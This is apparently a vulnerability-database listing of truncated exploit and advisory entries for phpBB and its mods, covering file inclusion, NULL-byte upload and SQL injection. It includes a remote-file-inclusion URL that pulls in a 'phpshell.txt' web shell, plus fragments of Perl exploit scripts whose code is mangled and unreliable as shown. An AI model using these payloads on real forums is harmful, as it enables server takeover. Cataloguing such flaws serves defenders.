phpBB XS 0.58 - 'functions.php' Remote File Inclusion

Author: AzzCoder Vendor: http://www.phpbbxs.eu/ Vulnerable File: includes/functions.php Vulnerable Code: //The phpbbrootpath isn't initialize includeonce $phpbbrootpath . './includes/functionscategorieshierarchy.' . $phpEx ; Method To Use:...

Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability

No description provided by source. credits: CeNGiZ-HaN contact: [email protected] team: www.system-defacers.org risk: High script: vitrax premodded phpbb script site: www.vitrax.org Exploit: http://target/path/includes/functionsportal.php?phpbbrootpath=phpshell.txt? GreeTz No One =...

phpBB XS 0.58 - functions.php Remote File Inclusion

phpBB XS 0.58 - functions.php Remote File Inclusion Author: AzzCoder Vendor: http://www.phpbbxs.eu/ Vulnerable File: includes/functions.php Vulnerable Code: //The phpbbrootpath isn't initialize includeonce $phpbbrootpath . './includes/functionscategorieshierarchy.' . $phpEx ; Method To Use:...

Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability

Exploit for unknown platform in category web applications =============================================================== Vitrax Pre-modded = 1.0.6-r3 Remote File Include Vulnerability =============================================================== credits: CeNGiZ-HaN risk: High script: vitrax...

phpBB <= 2.0.21 (Poison NULL Byte) Remote Exploit

Exploit for unknown platform in category web applications ================================================= phpBB newagent='Mozilla/4.0 compatible; Windows 5.1'; $ua-cookiejar HTTP::Cookies-new; $url='http://'.$ARGV0.'/login.php'; $data="username=".$ARGV1."&password=".$ARGV2."&login=1"; my $req =...

phpBB 2.0.21 - Poison Null Byte Remote File Upload

!/usr/bin/perl -w Author: ShAnKaR Title: multiple PHP application poison NULL byte vulnerability Applications: phpBB 2.0.21, punBB 1.2.12 Threat Level: Critical Original advisory in Russian: http://www.security.nnov.ru/Odocument221.html Poison NULL byte vulnerability for perl CGI applications was...

multiple PHP application poison NULL byte vulnerability

Author: ShAnKaR Title: multiple PHP application poison NULL byte vulnerability Applications: phpBB 2.0.21, punBB 1.2.12 Threat Level: Critical Poison NULL byte vulnerability for perl CGI applications was described in 1. ShAnKaR noted, that same vulnerability also affects different PHP application...

phpBB &lt;= 2.0.21 (Poison NULL Byte) Remote Exploit

No description provided by source. !/usr/bin/perl -w Author: ShAnKaR Title: multiple PHP application poison NULL byte vulnerability Applications: phpBB 2.0.21, punBB 1.2.12 Threat Level: Critical Original advisory in Russian: http://www.security.nnov.ru/Odocument221.html Poison NULL byte...

PT-2006-5449 · Premod · Premod Shadow

Name of the Vulnerable Software and Affected Versions: Premod Shadow versions 2.7.1 and earlier Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the phpbb root path parameter in the includes/functions portal.php file. Recommendations: For Premod Shadow...

[SA21787] Attachment Mod Attachment Script Insertion Vulnerability

TITLE: Attachment Mod Attachment Script Insertion Vulnerability SECUNIA ADVISORY ID: SA21787 VERIFY ADVISORY: http://secunia.com/advisories/21787/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: Attachment Mod 2.x module for phpBB http://secunia.com/product/4371/...

phpBB Shadow Premod <= 2.7.1 Remote File Include Vulnerability

Exploit for unknown platform in category web applications ============================================================== phpBB Shadow Premod = 2.7.1 Remote File Include Vulnerability ==============================================================...

phpBB Shadow Premod 2.7.1 - Remote File Inclusion

phpBB Shadow Premod 2.7.1 - Remote File Inclusion --------------------------------------------------------------------------- Shadow Prémod = 2.7.1 phpbbrootpath Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn...

phpBB Shadow Premod &lt;= 2.7.1 Remote File Include Vulnerability

No description provided by source. --------------------------------------------------------------------------- Shadow Prémod = 2.7.1 phpbbrootpath Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security...

CVE-2006-4450

usercpavatar.php in PHPBB 2.0.20, when avatar uploading is enabled, allows remote attackers to use the server as a web proxy by submitting a URL to the avatarurl parameter, which is then used in an HTTP GET request...

CVE-2006-4450

CVE-2006-4450 affects PHPBB 2.0.20 when avatar uploading is enabled: the usercp_avatar.php avatarurl parameter is used to fetch a URL via HTTP GET, enabling an attacker to co-opt the server as a web proxy. The public description specifies the exploit path and impact as a proxy-like use, with CVSS...

CVE-2006-4450

usercpavatar.php in PHPBB 2.0.20, when avatar uploading is enabled, allows remote attackers to use the server as a web proxy by submitting a URL to the avatarurl parameter, which is then used in an HTTP GET request...

CVE-2006-4367

SQL injection vulnerability in alltopics.php in the All Topics Hack 1.5.0 and earlier for phpBB 2.0.21 allows remote attackers to execute arbitrary SQL commands via the start parameter...

CVE-2006-4367

The CVE-2006-4367 issue affects phpBB 2.0.21 with the All Topics Hack 1.5.0 and earlier, where alltopics.php is vulnerable to SQL injection via the start parameter. The underlying cause is an insecure handling of the start input, enabling an attacker to manipulate SQL execution remotely. Public r...

CVE-2006-4367

SQL injection vulnerability in alltopics.php in the All Topics Hack 1.5.0 and earlier for phpBB 2.0.21 allows remote attackers to execute arbitrary SQL commands via the start parameter...

phpBB All Topics Mod &lt;= 1.5.0 (start) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl print q / \ \ \ ,, / / '-./.-' .--' '--. / / /""\ \ \ SpiderZ ForumZ Security | | | | \ \ / / '..' Author: SpiderZ Exploit: All Topics Hack Sql injection For: phpBB 2.0.x - 2.0.21 Site: www.spiderz.altervista.org Site02: www.spiderz.netsons.org...